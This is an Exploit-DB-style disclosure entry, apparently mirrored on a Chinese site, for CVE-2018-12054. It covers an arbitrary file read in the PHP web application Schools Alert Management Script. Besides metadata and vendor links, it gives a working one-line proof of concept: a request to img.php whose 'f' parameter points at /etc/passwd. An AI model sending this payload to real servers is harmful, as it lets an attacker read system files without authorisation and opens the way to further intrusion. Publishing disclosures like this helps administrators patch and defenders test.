Schools Alert Management Script – Arbitrary File Read - 体验盒子

作者： M3@Pandas

日期： 2018-06-11

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/44874/

# Exploit Title: Schools Alert Management Script - Arbitrary File Read
# Date: 2018-06-07
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
# Category: Web Application
# Exploit Author: M3@Pandas
# Web: https://github.com/unh3x/just4cve/issues/4
# Tested on: Linux Mint
# CVE: CVE-2018-12054

# Proof of Concept：

/img.php?f=/./etc/./passwd